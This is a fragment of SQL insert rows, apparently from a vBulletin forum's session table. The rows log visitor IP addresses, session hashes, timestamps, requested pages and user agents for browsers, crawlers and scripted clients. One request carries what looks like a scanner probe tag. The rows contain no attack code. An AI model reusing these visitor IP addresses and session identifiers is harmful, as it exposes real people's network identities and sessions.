('c6160c9c0bf16ae8384dc1992ecdab8f', 133, '172.68.59.31', '6e9dca07b2c2f4e35c2c80298e236a58', 1470499615, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('6d595d51885fca0092ebddf6a4c6fa1f', 0, '75.83.33.10', 'ba39efc5f4d4e0440b566e5397aeea7f', 1474652352, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0196c35bef7a58638d97b752cc7a57a5', 0, '62.210.14.143', '0972a17b1b64ad0bc004c74e7a8b9968', 1470504231, '/member.php?u=388', 'Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4d95636e54b5b57ccdf0fba61eccf26e', 0, '31.193.132.228', 'c07d105908454c8e69bae2c850c66444', 1470506859, '/memberlist.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9292bb6c47b3f1662b31ab84699a7d2f', 0, '103.239.54.251', '25063dae133ddd5bd0eada243a92c036', 1470508155, '/index.php', 'python-requests/2.10.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('64af5bc611f0430f8f6f52aa4ddc5da9', 0, '5.61.140.158', 'f5bf6b69f83c704eae9a92a42b39f5a4', 1470508517, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5bf482ca17d87cea9d565a8881fbd77a', 0, '78.95.220.81', '98845c2a56ebc592085e7b5ea2f12671', 1470523821, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 1, 0, 0, 0, 0, 2, 0, 0),
('ffc6fdc29e29eb18c20256eb29d0f8c0', 133, '172.68.59.31', '6e9dca07b2c2f4e35c2c80298e236a58', 1470542701, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('158f3d0b4ea83bbdfc4ad05e205aa587', 0, '39.41.160.143', '40a72201f18efaf1727dbc45f4fd905c', 1470547631, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('27b9d85207fe754ec99a7c946558a302', 0, '207.46.13.152', '5e207e311e22cdc3b2095126a922fa93', 1470767844, '/showthread.php?t=2480', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4b4f88e1f0b8b2c5f33fb4e6a8abd888', 0, '207.46.13.190', '5e207e311e22cdc3b2095126a922fa93', 1470767810, '/archive/index.php/f-39.html', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('62f1e4d37ed58e94fa4d679d552117e0', 0, '207.46.13.136', '5e207e311e22cdc3b2095126a922fa93', 1470547756, '/showthread.php?t=1835', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('561dafca8c6d8b605fe363148eb95053', 0, '31.206.25.71', '5ffae6290fdf2eb6ab2dfee1e2d832b4', 1470560614, '/index.php', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('05d8ff896dbdaac35f654e18bb1b3f2d', 133, '172.68.59.31', '6e9dca07b2c2f4e35c2c80298e236a58', 1470585558, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('dcc6491a1f18c7b5bc73920fc097015b', 0, '62.210.14.143', '3f85afaa2bc2d66b417620fa1d1f25d5', 1470596800, '/member.php?u=388', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b5b578cb4ddd3c6dcf2ef88fdffc0c98', 0, '178.216.50.124', '93a26546d8aa5afbdb7b11d521293e02', 1470596802, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('202442312524dede1de6241acc129187', 0, '24.203.172.234', 'ec9220fb42df2f63b6d68c7fc69d1b2d', 1470619127, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d48caf76306e048d0a5a271247bf357c', 133, '172.68.59.31', '6e9dca07b2c2f4e35c2c80298e236a58', 1470628680, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('db042e23eaec6ea41f8879a8b3dec54a', 0, '39.41.225.179', 'faa9972c6fcfa7dee126795a17cf1690', 1470648809, '/register.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c8d192b87db45584ba3a227c387f80cf', 0, '172.68.11.206', 'c5b49a213721814cb3d048ece0be3d5f', 1470649057, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Versio', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6de90d62385760e90c4110ecc9bde3eb', 0, '109.64.100.49', '30302e6ea7aba7b1e0aaac77b28c7f2c', 1470654159, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5a7699b46f995026744e675ea99b325b', 0, '95.215.45.245', '98a5bdf70f2110770ff3b5b7a980b267', 1470667619, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a2fb785b015da721e8281e6a83384c09', 133, '172.68.59.31', '6e9dca07b2c2f4e35c2c80298e236a58', 1470671781, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('946b3db069cabbd1f8b6bea4d5b4b8ed', 0, '172.68.11.198', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1470676167, '/member.php?u=171', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('98cc1f9c2a28b3e8af115cbc0ce2e8fa', 0, '107.182.131.117', 'a0216f15ab1006f87c6ad07a7e62c6cf', 1470682564, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('86b852db5cd9cc7ba38feee051a46bf4', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474158258, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('5a05914e30a225cb878898d4582a27f8', 133, '172.68.59.31', '6e9dca07b2c2f4e35c2c80298e236a58', 1470714915, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('ae02a7bed8fee2c36c3dafc24f3f2503', 0, '210.48.222.9', '07ff68f9cc83b75d35f77f71efaaa755', 1470715735, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.10', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2039ccee766a11041e9170333005a454', 0, '36.84.67.238', 'adb93bd07e3224f92685a859bebcc335', 1470717308, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('98710c442a3797619ba3145d03214950', 0, '62.182.112.37', '27d44a59b247873a9bcde28ba8fcc126', 1470737550, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('01d4bb0650429d5d9f55944b7ea4086e', 161, '54.233.145.152', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1470739463, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('1215fd58bd36e2d4cf9feacebed5a58d', 0, '76.109.203.70', 'f0d75a5b2e5ee777ff6570820fab146e', 1470751253, '/index.php', 'python-requests/2.11.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4f7a6512a06d9e2f5cf45afd5986111e', 0, '41.104.66.219', 'bcf17f3c6887b3a2612fa805348ff778', 1470754394, '/index.php', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4f51e404a6efb3d6830413719f60dabf', 0, '197.9.221.16', '65d73f0bc7241dacd6d167fcee6dbce5', 1470755633, '/index.php', 'Mozilla/5.0 (Windows NT 5.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('82bc68cac07b7e777478a040e64558d1', 133, '172.68.59.31', '6e9dca07b2c2f4e35c2c80298e236a58', 1470757930, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('813873e26665bbd65c493fe990d4de2f', 0, '109.159.31.126', '41cbd25b5cd185e7aa2695e33f4419de', 1470758679, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('50d53407ef00b62fe22eac09e5148c98', 0, '172.68.10.206', '6dfb676deb3c7bb25ebab24092ed6b27', 1470758706, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d3404dad4dd75edca28e780ce1e21400', 0, '76.169.51.126', '129f68813e59bb8f05323f1ee91e6251', 1474393175, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3ed6816aa1e2f4b6c6df719e18a8943c', 0, '207.46.13.48', '5e207e311e22cdc3b2095126a922fa93', 1470874931, '/index.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b09cfa350ae12ae99a5f4c66b50a4162', 0, '213.123.9.73', 'bed21ea456418cbe3787316bb411e2f6', 1470778339, '/memberlist.php?', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1b2f12bcff49dd3e3ee2e79e569b903e', 0, '195.22.127.184', '37cdf4d5cc2f1e3fe5ec08b88b8a3b15', 1470786364, '/index.php?langid=2;w0rm.ws;VBULLETIN;24-09-2015', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cd3403ec82c6c5a7394fe3896f9e2d8b', 0, '151.237.179.221', 'b6bf0c812aa9e07a8774f0c63604254e', 1470786370, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4f4be49337d65b438670449d4cf8e902', 0, '172.68.11.250', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1470798507, '/misc.php?do=whoposted&t=1674', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0d31c15de956210add19d47ed96570dd', 133, '172.68.59.31', '6e9dca07b2c2f4e35c2c80298e236a58', 1470800622, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('929023005d1ee3209356cdeeb5c20358', 0, '79.188.75.181', 'fea2855469cd2fbf99f3d99448863c22', 1471035181, '/archive/index.php/t-1196.html', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('856f19d25a6efc2439289d1eab4e1f90', 0, '172.68.11.245', 'fc17cdf0c47f878d01cdd4407094d99d', 1470836519, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d4176e697f952dec7fe67773a12a5cff', 0, '94.66.57.62', 'c3f190663637b8a0af22c983da370b30', 1470812295, '/showthread.php?p=2928', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c14dcf799ba63ef9587004a4a0171f27', 0, '82.82.217.135', '1231dac8f945eb0185dde648a22df333', 1470816675, '/index.php?', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3929487137dbfdf6085e8e51278bbff0', 0, '85.26.207.182', '7c7a593bc47daaef8a63d74759725cee', 1470835927, '/memberlist.php?', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2b43b39363ff538673bbda0538f6ba1e', 0, '40.77.167.30', 'c5490a5a8e1813ac25cf9e19091dcb85', 1473352158, '/printthread.php?t=2342', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a2974424b006163b7a7e211499289d03', 0, '172.68.11.252', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1474750511, '/showthread.php?p=2913', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c83ed42068f04f43c8bfde6693b0533e', 0, '172.68.10.206', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1470840036, '/showthread.php?p=2879&mode=threaded', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d39cb56ef345d21316ee7abc7fb67272', 0, '172.68.10.204', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1470843113, '/archive/index.php/f-37.html', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('2a973a17c9cff6ff31e4f7cb4cbf0955', 133, '172.68.59.31', '6e9dca07b2c2f4e35c2c80298e236a58', 1470843297, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('d2084b0241e41b334b830800df4d579b', 0, '172.68.11.245', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1470845459, '/member.php?u=41', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('32f4798d48ee6f1f03392654264d5866', 0, '178.238.233.90', '886f9cf30bdf90ae27ebc0258d722e66', 1470862635, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('999916275571d30c54ab85167e521914', 0, '37.232.77.28', 'fece7a6fed86cc9564fb6b2834f80876', 1470926441, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2f8c546638a573309bfd18d4f40f158f', 0, '193.180.165.232', '9edd0cc723ac3acdf6faca77957d7f37', 1470864545, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('61db406fe1242e7ced5606515572597c', 0, '88.243.162.187', 'b09f8f859f6cc1f02831186006630a97', 1470865814, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('69d695ee8ec3e23935dde60c1940cec6', 0, '84.174.38.59', '8b680304d9990fdd56aa174a9050056b', 1470873086, '/faq.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0ff9a8858a9272c31ddec0b25d9af05d', 0, '106.11.34.49', 'b203c2eae7d7b91bb2f1e04455d95d7a', 1470885548, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('06a74fe867dddc599d04ff1560740459', 133, '172.68.59.31', '6e9dca07b2c2f4e35c2c80298e236a58', 1470885940, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('35a3e19839814c3c432f4f5ca989f235', 0, '88.119.196.104', '119078afda2bb28d88370bef2f0f250e', 1470897728, '/showthread.php?t=2330', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('42c7f0cf1852e162381334191fb18baf', 0, '1.55.193.24', '02e7d29fe76b214fa8ac9a9cc9ff044d', 1470902835, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cb65385cf0932191cb330bfd37d5706b', 0, '66.249.64.148', 'b74d0bcf4e50a120a01910c89bfe2d08', 1470905808, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9aaf25283045d2fbb1c7d5d23271f16c', 161, '54.233.145.152', 'd8752cf67051540a22ada9c27a70dc20', 1470907386, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('55d4271ed3dc4b0821a2a40ee4cf10f4', 0, '107.167.97.145', 'ac04775486d2a70a756e9e9b9f80c5ae', 1470910341, '/register.php?', 'Opera/9.80 (Android; Opera Mini/18.0.2254/37.8814; U; en) Presto/2.12.423 Version/12.16', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('801b301b3670acc1e4f0a20845ad00fe', 0, '168.1.53.199', '51978e2f6ed12a9a4d89016ef9642887', 1470920069, '/index.php?langid=1', 'Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.7.1', 0, 1, 0, 0, 0, 0, 2, 0, 0),
('8926b57be443fe547bdd522166f98abd', 0, '168.1.6.48', '384d3f8b11c882d74abe09ee0522f822', 1470924259, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.7.1', 0, 1, 0, 0, 0, 0, 2, 0, 0),
('41afa023a7eeca6dddeb7519d4874a3b', 0, '103.208.244.199', 'c11fcf703f022d41f2eef8af21a29dcf', 1470924823, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d80e0968b6b04c0446ab848cd9554574', 133, '172.68.59.31', '6e9dca07b2c2f4e35c2c80298e236a58', 1470928749, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('b25293dff64e0abac5ef3da8231f4b0e', 0, '46.143.139.184', 'e758352a4caa2ad308aa8a9f622f0895', 1474141695, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.27', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('738b5782861c82a7c5e7b15048a32d62', 0, '172.68.10.244', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1470938687, '/member.php?u=337', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e7228ca8569520a337817bed7aac4c4a', 0, '207.46.13.143', '5e207e311e22cdc3b2095126a922fa93', 1471071494, '/index.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ce2130b1ebbdf5925118e7245ae49ed2', 0, '40.77.167.46', 'c5490a5a8e1813ac25cf9e19091dcb85', 1470945140, '/member.php?u=387', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5801c8c52c973f149ad5e6993ceb3d64', 0, '157.55.39.119', '23f3103f44bc3badcba53554e5e4cb6d', 1470945188, '/showthread.php?t=1835', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d104e44cd164ebd6f11248bb509b276c', 0, '66.249.64.24', '881de0811167d68e6f4733be9b8109c2', 1471022788, '/showthread.php?t=1857', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('af2f6cae47ff3e19d9efbc3ff9c94611', 0, '172.68.11.236', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1474727682, '/showthread.php?p=2846&mode=threaded', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('22ffa60b24578c1a0025b0f8194337de', 0, '66.249.64.18', '881de0811167d68e6f4733be9b8109c2', 1470955577, '/archive/index.php/f-36.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('ede43d2a34fe7ae898b6c9f83467caf2', 0, '66.249.64.21', '881de0811167d68e6f4733be9b8109c2', 1470986230, '/login.php?do=lostpw', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('89c0b8f1e582a99c2ae1fd5a430274ad', 0, '66.249.64.27', '881de0811167d68e6f4733be9b8109c2', 1470973418, '/showthread.php?t=1828', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('094f5c047c17e92771df9ff797ad95fb', 0, '66.249.64.30', '881de0811167d68e6f4733be9b8109c2', 1470962486, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fb7b62f31f388fb4c73b2e88a949138a', 133, '172.68.59.31', '6e9dca07b2c2f4e35c2c80298e236a58', 1470971539, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('839117a5f37bb9da867a1c15e8a8e2e0', 0, '108.3.155.175', '2d46cd5202dea27e961480e99fb9cae5', 1470974155, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('886f433ef1f5978c1b62b6aa199d5c35', 0, '42.112.159.122', 'bdae2426070f1a0030850ca9f753ed55', 1470978064, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9a0e7d32c5327a7ea814bb46fcd21208', 161, '54.233.145.152', 'd8752cf67051540a22ada9c27a70dc20', 1470996423, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('2b39ecb6166e3dcf59617996a781d303', 0, '199.59.150.183', '943ffc0fc3c44360d2911a2a7ed4b039', 1470998240, '/showthread.php?p=3015', 'Twitterbot/1.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0a6b5b5e9fec19a889aa07c3edfa9816', 388, '5.223.154.142', '8463e633e8e87f7a3e52b0a7ec97a54b', 1471000807, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 2, 0, 0, 0, 0, 0, 0),
('9a9e277fcd1d6660bfbf45cabf2a89a2', 0, '172.68.10.197', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1475258264, '/showthread.php?t=2347', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5a4d405fc2a989eb1ed0d6e9d4a81fc7', 0, '172.68.10.245', 'dc2efbae7caf0a7504935ea8ec9b50be', 1471016535, '/showthread.php?p=2928', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('81a6cdb714043242ca39f06a1f42e6c5', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471022241, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('85ef7e0ee02eb1a35fd1358b7f258567', 0, '95.85.18.24', 'bc9cb47e2be414261c52f6f62be73d1d', 1471027829, '/index.php', 'SafeDNSBot (https://www.safedns.com/searchbot)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6a694e057402c7c7001b2617ead34f75', 0, '70.127.12.221', '15a911c1878792eb2f882c7f06a3be60', 1471038521, '/memberlist.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4', 0, 0, 0, 0, 0, 0, 2, 0, 0),
